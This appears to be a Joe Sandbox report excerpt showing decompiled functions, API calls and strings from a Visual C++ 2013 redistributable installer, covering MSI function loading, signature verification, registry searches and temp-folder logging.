0x012b3dac
0x012b3db2
0x012b3db4
0x012b3db4
0x012b3dc4
0x012b3dc6
0x012b3dcb
0x012b3dd1
0x012b3dd3
0x012b3dd3
0x012b3de3
0x012b3de5
0x012b3dea
0x012b3df0
0x012b3df2
0x012b3df2
0x012b3e02
0x012b3e04
0x012b3e0a
0x012b3e10
0x012b3e12
0x012b3e12
0x012b3e17
0x012b3e17
0x012b3e25

APIs

Part of subcall function 012B2A2D: _memset.LIBCMT ref: 012B2A54
Part of subcall function 012B2A2D: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 012B2A69
Part of subcall function 012B2A2D: LoadLibraryW.KERNELBASE(?,?,00000104,01281C3B), ref: 012B2AB7
Part of subcall function 012B2A2D: GetLastError.KERNEL32 ref: 012B2AC3

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,0000011C), ref: 012B3D48
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 012B3D67
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 012B3D86
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 012B3DA5
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 012B3DC4
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 012B3DE3
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 012B3E02

Strings

MsiGetProductInfoExW, xrefs: 012B3DB9
MsiEnumProductsExW, xrefs: 012B3D7B
Msi.dll, xrefs: 012B3D20
MsiSetExternalUIRecord, xrefs: 012B3DD8
MsiSourceListAddSourceExW, xrefs: 012B3DF7
MsiGetPatchInfoExW, xrefs: 012B3D9A
MsiDeterminePatchSequenceW, xrefs: 012B3D3D
MsiDetermineApplicablePatchesW, xrefs: 012B3D5C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AddressProc$DirectoryErrorLastLibraryLoadSystem_memset
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 3669249573-1735120554
Opcode ID: f6c718065d9d775dac88d12cb1f56d4b7d84b5d3675b5283d68d10a757e8df3c
Instruction ID: 6712d79d5ed85ab3376aa2ea5d4c96148408cb35682f0b67b40d086e7501c331
Opcode Fuzzy Hash: f6c718065d9d775dac88d12cb1f56d4b7d84b5d3675b5283d68d10a757e8df3c
Instruction Fuzzy Hash: DF21E271E63651AEE732FF29F98D9683AB5FB49792310C22BE5409A51CE3F10850DF40

Uniqueness

Uniqueness Score: -1.00%

Function 012858D0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E012858D0(void* __edi, signed int _a4, intOrPtr* _a8, signed int* _a12) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr* _t49;
				signed int _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr _t60;
				intOrPtr* _t71;
				void* _t89;
				void* _t90;

				_v24 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_t90 = E012B4F9E(_a4, L"SoftwareTag",  &_v24);
				if(_t90 >= 0) {
					_t49 = _v24;
					_t76 =  *_t49;
					_t90 =  *((intOrPtr*)( *_t49 + 0x20))(_t49,  &_v20);
					if(_t90 >= 0) {
						_t51 = _v20;
						if(_t51 == 0) {
							L20:
							 *_a12 = _t51;
							 *_a8 = _v16;
							_v16 = 0;
							_t90 = 0;
						} else {
							_t60 = E012B233B(_t51 * 0xc, 1);
							_v16 = _t60;
							if(_t60 != 0) {
								_t51 = _v20;
								_a4 = 0;
								if(_t51 <= 0) {
									goto L20;
								} else {
									_t89 = _v16 + 8;
									while(1) {
										_t90 = E012B5026(_t76, _v24,  &_v12, 0);
										if(_t90 < 0) {
											break;
										}
										_t90 = E012B540B(_v12, L"Filename", _t89 - 8);
										if(_t90 < 0) {
											_push("Failed to get @Filename.");
											goto L36;
										} else {
											_t90 = E012B540B(_v12, L"Regid", _t89 - 4);
											if(_t90 < 0) {
												_push("Failed to get @Regid.");
												goto L36;
											} else {
												_t90 = E012B4F2F(_v12,  &_v8);
												if(_t90 < 0) {
													_push("Failed to get SoftwareTag text.");
													goto L36;
												} else {
													_t90 = E012B076E(_t89, _v8, 0, 0xfde9);
													if(_t90 < 0) {
														_push("Failed to convert SoftwareTag text to UTF-8");
														goto L36;
													} else {
														if(_v8 != 0) {
															__imp__#6(_v8);
															_v8 = 0;
														}
														_t71 = _v12;
														if(_t71 != 0) {
															_t76 =  *_t71;
															 *((intOrPtr*)( *_t71 + 8))(_t71);
															_v12 = 0;
														}
														_a4 = _a4 + 1;
														_t51 = _v20;
														_t89 = _t89 + 0xc;
														if(_a4 < _t51) {
															continue;
														} else {
															goto L20;
														}
													}
												}
											}
										}
										goto L21;
									}
									_push("Failed to get next node.");
									goto L36;
								}
							} else {
								_t90 = 0x8007000e;
								E012B294E(_t60, "registration.cpp", 0x409, 0x8007000e);
								_push("Failed to allocate memory for software tag structs.");
								L36:
								_push(_t90);
								E012AFA86();
							}
						}
						L21:
					} else {
						_push("Failed to get software tag count.");
						goto L4;
					}
				} else {
					_push("Failed to select software tag nodes.");
					L4:
					_push(_t90);
					E012AFA86();
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t53 = _v12;
				if(_t53 != 0) {
					 *((intOrPtr*)( *_t53 + 8))(_t53);
				}
				_t54 = _v24;
				if(_t54 != 0) {
					 *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				if(_v16 != 0) {
					E012B24F6(_v16);
				}
				return _t90;
			}

0x012858e6
0x012858e9
0x012858ec
0x012858ef
0x012858f2
0x012858fa
0x012858fe
0x01285907
0x0128590a
0x01285914
0x01285918
0x0128592c
0x01285932
0x01285a2c
0x01285a2f
0x01285a37
0x01285a39
0x01285a3c
0x01285938
0x0128593e
0x01285943
0x01285948
0x01285969
0x0128596c
0x01285971
0x00000000
0x01285977
0x0128597a
0x0128597d
0x0128598a
0x0128598e
0x00000000
0x00000000
0x012859a5
0x012859a9
0x01285a83
0x00000000
0x012859af
0x012859c0
0x012859c4
0x01285a8a
0x00000000
0x012859ca
0x012859d6
0x012859da
0x01285a91
0x00000000
0x012859e0
0x012859ef
0x012859f3
0x01285a98
0x00000000
0x012859f9
0x012859fc
0x01285a01
0x01285a07
0x01285a07
0x01285a0a
0x01285a0f
0x01285a11
0x01285a14
0x01285a17
0x01285a17
0x01285a1a
0x01285a1d
0x01285a20
0x01285a26
0x00000000
0x00000000
0x00000000
0x00000000
0x01285a26
0x012859f3
0x012859da
0x012859c4
0x00000000
0x012859a9
0x01285a7c
0x00000000
0x01285a7c
0x0128594a
0x0128594a
0x0128595a
0x0128595f
0x01285a9d
0x01285a9d
0x01285a9e
0x01285aa4
0x01285948
0x01285a3e
0x0128591a
0x0128591a
0x00000000
0x0128591a
0x01285900
0x01285900
0x0128591f
0x0128591f
0x01285920
0x01285926
0x01285a42
0x01285a47
0x01285a47
0x01285a4d
0x01285a52
0x01285a57
0x01285a57
0x01285a5a
0x01285a5f
0x01285a64
0x01285a64
0x01285a6a
0x01285a6f
0x01285a6f
0x01285a79

APIs

SysFreeString.OLEAUT32(?), ref: 01285A47

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

SysFreeString.OLEAUT32(?), ref: 01285A01

Strings

Failed to get @Filename., xrefs: 01285A83
SoftwareTag, xrefs: 012858DE
Failed to allocate memory for software tag structs., xrefs: 0128595F
Failed to get @Regid., xrefs: 01285A8A
registration.cpp, xrefs: 01285955
Filename, xrefs: 01285998
Failed to convert SoftwareTag text to UTF-8, xrefs: 01285A98
Regid, xrefs: 012859B3
Failed to select software tag nodes., xrefs: 01285900
Failed to get next node., xrefs: 01285A7C
Failed to get SoftwareTag text., xrefs: 01285A91
Failed to get software tag count., xrefs: 0128591A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Regid$SoftwareTag$registration.cpp
API String ID: 336948655-11506941
Opcode ID: c757dc421b1e5de2901cd726f7615ca65bc1f4795af7c1aef0c2fff682856875
Instruction ID: 94ae098d63bb94c1a86bdcabb8d612118df826b308f5fcc6921ce6c1df010c32
Opcode Fuzzy Hash: c757dc421b1e5de2901cd726f7615ca65bc1f4795af7c1aef0c2fff682856875
Instruction Fuzzy Hash: E6518D71E2235AEFCB10FFE4C8C18EDFBB5AB08355B1444A9EA12B7241D3719E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 01298A1A Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E01298A1A(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				short _v10;
				intOrPtr _v14;
				intOrPtr _v18;
				short _v20;
				struct _EXCEPTION_POINTERS _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				void _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t50;
				signed int _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t73;
				signed int _t77;
				signed int _t78;

				_t73 = __edx;
				_t36 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t36 ^ _t78;
				_v32 = _a4;
				_v28 = _a8;
				_t66 = _a12;
				_v20 = 0xcd44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_push(0x30);
				asm("stosd");
				_pop(0);
				_v24 = 0xaac56b;
				_v18 = 0xc28c11d0;
				_v14 = 0xc24fc000;
				_v10 = 0xee95;
				E012A7E30( &_v96, 0, 0);
				_t77 = E012B5640(_t66, 0, 0, 0, 0);
				if(_t77 >= 0) {
					_v44 = _v28;
					_v76 = 1;
					_v68 = 1;
					_v48 = 0x10;
					_v40 = _t66;
					_v96 = 0;
					_v72 =  &_v48;
					_v56 = 0x80;
					_v84 = 2;
					_t50 = WinVerifyTrust(0xffffffff,  &_v24,  &_v96);
					__eflags = _t50;
					if(_t50 == 0) {
						L9:
						_push(_v64);
						L012AF04E();
						__eflags = _t50;
						if(_t50 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(_t50);
							L012AF048();
							__eflags = _t50;
							if(_t50 != 0) {
								_t77 = E01298101( *((intOrPtr*)(_t50 + 0x28)), _v32);
								__eflags = _t77;
								if(_t77 < 0) {
									_push("Failed to verify expected payload against actual certificate chain.");
									goto L23;
								}
							} else {
								_t55 = GetLastError();
								__eflags = _t55;
								if(_t55 > 0) {
									_t55 = _t55 & 0x0000ffff | 0x80070000;
									__eflags = _t55;
								}
								_t77 = _t55;
								__eflags = _t77;
								if(_t77 >= 0) {
									_t77 = 0x80004005;
								}
								E012B294E(_t55, "cache.cpp", 0x3d9, _t77);
								_push("Failed to get signer chain from authenticode certificate.");
								goto L23;
							}
						} else {
							_t58 = GetLastError();
							__eflags = _t58;
							if(_t58 > 0) {
								_t58 = _t58 & 0x0000ffff | 0x80070000;
								__eflags = _t58;
							}
							_t77 = _t58;
							__eflags = _t77;
							if(_t77 >= 0) {
								_t77 = 0x80004005;
							}
							E012B294E(_t58, "cache.cpp", 0x3d6, _t77);
							_push("Failed to get provider state from authenticode certificate.");
							goto L23;
						}
					} else {
						_v56 = _v56 | 0x00001000;
						_t50 = WinVerifyTrust(0xffffffff,  &_v24,  &_v96);
						__eflags = _t50;
						if(__eflags == 0) {
							goto L9;
						} else {
							if(__eflags > 0) {
								_t50 = _t50 & 0x0000ffff | 0x80070000;
								__eflags = _t50;
							}
							_t77 = _t50;
							__eflags = _t77;
							if(_t77 >= 0) {
								_t77 = 0x80004005;
							}
							E012B294E(_t50, "cache.cpp", 0x3d2, _t77);
							E012AFA86(_t77, "Failed authenticode verification of payload: %ls", _v28);
						}
					}
				} else {
					_push("Failed to move file pointer to beginning of file.");
					L23:
					_push(_t77);
					E012AFA86();
				}
				return E012A7EAA(_t77, _t66, _v8 ^ _t78, _t73, 0, _t77);
			}

0x01298a1a
0x01298a20
0x01298a27
0x01298a2d
0x01298a34
0x01298a37
0x01298a41
0x01298a4a
0x01298a4b
0x01298a4c
0x01298a4d
0x01298a4f
0x01298a50
0x01298a59
0x01298a60
0x01298a67
0x01298a6e
0x01298a74
0x01298a86
0x01298a8a
0x01298a99
0x01298a9f
0x01298aa2
0x01298ab2
0x01298ab9
0x01298abc
0x01298abf
0x01298ac2
0x01298ac9
0x01298ad0
0x01298ad5
0x01298ad7
0x01298b30
0x01298b30
0x01298b33
0x01298b3a
0x01298b3c
0x01298b74
0x01298b75
0x01298b76
0x01298b77
0x01298b78
0x01298b7d
0x01298b7f
0x01298bc2
0x01298bc4
0x01298bc6
0x01298bc8
0x00000000
0x01298bc8
0x01298b81
0x01298b81
0x01298b87
0x01298b89
0x01298b90
0x01298b90
0x01298b90
0x01298b95
0x01298b97
0x01298b99
0x01298b9b
0x01298b9b
0x01298bab
0x01298bb0
0x00000000
0x01298bb0
0x01298b3e
0x01298b3e
0x01298b44
0x01298b46
0x01298b4d
0x01298b4d
0x01298b4d
0x01298b52
0x01298b54
0x01298b56
0x01298b58
0x01298b58
0x01298b68
0x01298b6d
0x00000000
0x01298b6d
0x01298ad9
0x01298ad9
0x01298aea
0x01298aef
0x01298af1
0x00000000
0x01298af3
0x01298af3
0x01298afa
0x01298afa
0x01298afa
0x01298aff
0x01298b01
0x01298b03
0x01298b05
0x01298b05
0x01298b15
0x01298b23
0x01298b28
0x01298af1
0x01298a8c
0x01298a8c
0x01298bcd
0x01298bcd
0x01298bce
0x01298bd4
0x01298be5

APIs

_memset.LIBCMT ref: 01298A74

Part of subcall function 012B5640: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,01297D44,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 012B5656
Part of subcall function 012B5640: GetLastError.KERNEL32(?,01297D44,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,012995E8,00000000,?), ref: 012B5660

WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 01298AD0
WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 01298AEA

Strings

Failed authenticode verification of payload: %ls, xrefs: 01298B1D
Failed to move file pointer to beginning of file., xrefs: 01298A8C
Failed to verify expected payload against actual certificate chain., xrefs: 01298BC8
Failed to get provider state from authenticode certificate., xrefs: 01298B6D
cache.cpp, xrefs: 01298B10, 01298B63, 01298BA6
Failed to get signer chain from authenticode certificate., xrefs: 01298BB0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: TrustVerify$ErrorFileLastPointer_memset
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to move file pointer to beginning of file.$Failed to verify expected payload against actual certificate chain.$cache.cpp
API String ID: 2460818389-4294895434
Opcode ID: edbbae19be0ba88dd1971d32772bc717ddfc0991ae4f41f4a75d3bd442fe4ec7
Instruction ID: 33b349feccf6cfa5d43bd234d6d19517d7bfd38695ee88aa8a5be6e09bbe4733
Opcode Fuzzy Hash: edbbae19be0ba88dd1971d32772bc717ddfc0991ae4f41f4a75d3bd442fe4ec7
Instruction Fuzzy Hash: 3941FB72D6021EABCB11DF9DDC44AEFBFB8AF15760F184229E614F7140E674890587E0

Uniqueness

Uniqueness Score: -1.00%

Function 01287807 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 140
registryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01287807(void* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				int* _v12;
				int* _v16;
				int* _v20;
				int _v24;
				signed int _t53;
				signed int _t56;
				signed int _t64;
				void* _t67;
				signed int _t69;
				void* _t70;
				void* _t71;

				_t70 = __esi;
				_t67 = __edx;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 1;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					_v16 = 0x101;
				}
				if(E01288C14(_a4,  *((intOrPtr*)(_t70 + 0x1c)),  &_v8, 0) >= 0) {
					_t69 = E012B378B( *((intOrPtr*)(_t70 + 0x18)), _v8, _v16,  &_v20);
					__eflags = _t69;
					if(_t69 < 0) {
						__eflags = _t69 - 0x80070002;
						if(_t69 != 0x80070002) {
							E012AFA86(_t69, "Failed to open registry key. Key = \'%ls\'", _v8);
							_t71 = _t71 + 0xc;
							goto L25;
						}
						_push( *((intOrPtr*)(_t70 + 4)));
						_push(_v8);
						_push("Registry key not found. Key = \'%ls\'; variable = \'%ls\'");
						L20:
						_push(2);
						E012AF6A2();
						_t71 = _t71 + 0x10;
						_v16 = 0;
						L22:
						asm("cdq");
						_t69 = E0128A6F5(_a4,  *((intOrPtr*)(_t70 + 4)), _v16, _t67, 0);
						__eflags = _t69;
						if(_t69 >= 0) {
							goto L27;
						}
						_push("Failed to set variable.");
						goto L24;
					}
					_t53 =  *(_t70 + 0x20);
					_v16 = 1;
					__eflags = _t53;
					if(_t53 == 0) {
						goto L22;
					}
					_t69 = E01288C14(_a4, _t53,  &_v12, 0);
					__eflags = _t69;
					if(_t69 >= 0) {
						_t56 = RegQueryValueExW(_v20, _v12, 0,  &_v24, 0, 0);
						_t64 = _t56;
						__eflags = _t64;
						if(_t64 == 0) {
							_v16 = 1;
							goto L22;
						}
						__eflags = _t64 == 0;
						if(_t64 == 0) {
							_push(_v12);
							_push(_v8);
							_push("Registry value not found. Key = \'%ls\', Value = \'%ls\'");
							goto L20;
						}
						__eflags = _t56;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags > 0) {
							_t56 = _t56 & 0x0000ffff | 0x80070000;
							__eflags = _t56;
						}
						_t69 = _t56;
						__eflags = _t69;
						if(_t69 >= 0) {
							_t69 = 0x80004005;
						}
						E012B294E(_t56, "search.cpp", 0x31f, _t69);
						_push("Failed to query registry key value.");
						goto L24;
					}
					_push("Failed to format value string.");
					goto L24;
				} else {
					_push("Failed to format key string.");
					L24:
					_push(_t69);
					E012AFA86();
					L25:
					if(_t69 < 0) {
						_push(_t69);
						E012AF6A2(2, "RegistrySearchExists failed: ID \'%ls\', HRESULT 0x%x", _v8);
					}
					L27:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					if(_v12 != 0) {
						E012B01E8(_v12);
					}
					if(_v20 != 0) {
						RegCloseKey(_v20);
					}
					return _t69;
				}
			}

0x01287807
0x01287807
0x01287811
0x01287814
0x01287817
0x0128781a
0x0128781d
0x01287827
0x01287829
0x01287829
0x01287844
0x01287862
0x01287864
0x01287866
0x01287898
0x0128789e
0x012878b6
0x012878bb
0x00000000
0x012878bb
0x012878a0
0x012878a3
0x012878a6
0x0128791d
0x0128791d
0x0128791f
0x01287924
0x01287927
0x01287933
0x01287937
0x01287945
0x01287947
0x01287949
0x00000000
0x00000000
0x0128794b
0x00000000
0x0128794b
0x01287868
0x0128786b
0x01287872
0x01287874
0x00000000
0x00000000
0x01287888
0x0128788a
0x0128788c
0x012878d0
0x012878d8
0x012878d8
0x012878da
0x0128792c
0x00000000
0x0128792c
0x012878dd
0x012878de
0x01287912
0x01287915
0x01287918
0x00000000
0x01287918
0x012878e0
0x012878e2
0x00000000
0x00000000
0x012878e4
0x012878eb
0x012878eb
0x012878eb
0x012878f0
0x012878f2
0x012878f4
0x012878f6
0x012878f6
0x01287906
0x0128790b
0x00000000
0x0128790b
0x0128788e
0x00000000
0x01287846
0x01287846
0x01287950
0x01287950
0x01287951
0x01287958
0x0128795a
0x0128795c
0x01287967
0x0128796c
0x0128796f
0x01287972
0x01287977
0x01287977
0x0128797f
0x01287984
0x01287984
0x0128798c
0x01287991
0x01287991
0x0128799c
0x0128799c

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0128783B
RegCloseKey.ADVAPI32(?,00000000,?,?,01288B4A,?), ref: 01287991

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

_MREFOpen@16.MSPDB140-MSVCRT ref: 01287883
RegQueryValueExW.ADVAPI32(?,?,00000000,01288B4A,00000000,00000000,?,?,?,00000000,?,?,00000001,?,?,?), ref: 012878D0

Strings

Failed to open registry key. Key = '%ls', xrefs: 012878B0
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 01287918
search.cpp, xrefs: 01287901
Failed to set variable., xrefs: 0128794B
Registry key not found. Key = '%ls'; variable = '%ls', xrefs: 012878A6
Failed to format value string., xrefs: 0128788E
Failed to format key string., xrefs: 01287846
Failed to query registry key value., xrefs: 0128790B
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 01287960

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16$CloseOpenQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'; variable = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 3932663376-1654530643
Opcode ID: 73394ae5fdc6ca626083aed62f91ad854058c86ac85de4742fff68d27f107a77
Instruction ID: cb54af5367464de17b8f2a026f146a17293a0024ec38020cb19d1d6b364ef15e
Opcode Fuzzy Hash: 73394ae5fdc6ca626083aed62f91ad854058c86ac85de4742fff68d27f107a77
Instruction Fuzzy Hash: CB41BF7293120AFFDF11BFA8CCC5DFEBBBAAB54300F25042DE31562190E6754A41AB61

Uniqueness

Uniqueness Score: -1.00%

Function 01291D5C Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E01291D5C(void* __ebx, void* __edx) {
				signed int _v8;
				short _v528;
				int _v532;
				int _v536;
				int _v540;
				char _v544;
				void* __edi;
				void* __esi;
				signed int _t29;
				long _t39;
				signed int _t52;
				void* _t55;
				void* _t56;
				void* _t61;
				signed int _t64;
				signed int _t66;
				signed int _t67;

				_t61 = __edx;
				_t55 = __ebx;
				_t29 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t29 ^ _t67;
				E012A7E30( &_v528, 0, 0x208);
				_v536 = 0;
				_v544 = 0;
				_v532 = 0;
				_v540 = 0;
				if(GetTempPathW(0x104,  &_v528) != 0) {
					_t64 = E01291CA7( &_v528, 0x104,  &_v536);
					if(_t64 >= 0) {
						_t39 = GetCurrentProcessId();
						__imp__ProcessIdToSessionId(_t39,  &_v544);
						if(_t39 == 0) {
							L15:
							_t64 = E012B1171(_t56, _t61, _t55,  &_v528, _v536);
							if(_t64 >= 0) {
								L18:
								if(_v532 != 0) {
									E012B01E8(_v532);
								}
								return E012A7EAA(_t64, _t55, _v8 ^ _t67, _t61, 0, _t64);
							}
							_push("Failed to copy temp folder.");
							L17:
							_push(_t64);
							E012AFA86();
							goto L18;
						}
						_t64 = E012B177A( &_v532, L"%u\\", _v544);
						if(_t64 >= 0) {
							_t64 = E01291CA7(_v532, 0x7fffffff,  &_v540);
							if(_t64 >= 0) {
								_t66 = _v536 - _v540;
								if(CompareStringW(0, 0, _t67 + _t66 * 2 - 0x20c, _v540, _v532, _v540) == 2) {
									_v536 = _t66;
								}
								goto L15;
							}
							_push("Failed to get length of session id string.");
							goto L17;
						}
						_push("Failed to format session id as a string.");
						goto L17;
					}
					_push("Failed to get length of temp folder.");
					goto L17;
				}
				_t52 = GetLastError();
				if(_t52 > 0) {
					_t52 = _t52 & 0x0000ffff | 0x80070000;
				}
				_t64 = _t52;
				if(_t64 >= 0) {
					_t64 = 0x80004005;
				}
				E012B294E(_t52, "logging.cpp", 0x271, _t64);
				_push("Failed to get temp folder.");
				goto L17;
			}

0x01291d5c
0x01291d5c
0x01291d65
0x01291d6c
0x01291d80
0x01291d95
0x01291d9b
0x01291da1
0x01291da7
0x01291db5
0x01291e04
0x01291e08
0x01291e1b
0x01291e22
0x01291e2a
0x01291eb4
0x01291ec7
0x01291ecb
0x01291eda
0x01291ee0
0x01291ee8
0x01291ee8
0x01291efc
0x01291efc
0x01291ecd
0x01291ed2
0x01291ed2
0x01291ed3
0x00000000
0x01291ed9
0x01291e47
0x01291e4e
0x01291e6e
0x01291e72
0x01291e8d
0x01291eac
0x01291eae
0x01291eae
0x00000000
0x01291eac
0x01291e74
0x00000000
0x01291e74
0x01291e50
0x00000000
0x01291e50
0x01291e0a
0x00000000
0x01291e0a
0x01291db7
0x01291dbf
0x01291dc6
0x01291dc6
0x01291dcb
0x01291dcf
0x01291dd1
0x01291dd1
0x01291de1
0x01291de6
0x00000000

APIs

_memset.LIBCMT ref: 01291D80
GetTempPathW.KERNEL32(00000104,?,?,00000001,00000009), ref: 01291DAD
GetLastError.KERNEL32(?,00000001,00000009), ref: 01291DB7
GetCurrentProcessId.KERNEL32(?,?,00000104,?,?,00000001,00000009), ref: 01291E1B
ProcessIdToSessionId.KERNEL32(00000000,?,00000001,00000009), ref: 01291E22

Strings

Failed to format session id as a string., xrefs: 01291E50
logging.cpp, xrefs: 01291DDC
Failed to copy temp folder., xrefs: 01291ECD
Failed to get temp folder., xrefs: 01291DE6
Failed to get length of temp folder., xrefs: 01291E0A
%u\, xrefs: 01291E3C
Failed to get length of session id string., xrefs: 01291E74

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Process$CurrentErrorLastPathSessionTemp_memset
String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$logging.cpp
API String ID: 1047854834-1016737523
Opcode ID: 10f488f8156ce3336689c0a5deaaacbb5cb5dfcf6d2b8c93ee06be2294728c1b
Instruction ID: d71f998da9c335c414ad8647bf217d99b6085981b7effaa8c50d19c36bc0f16a
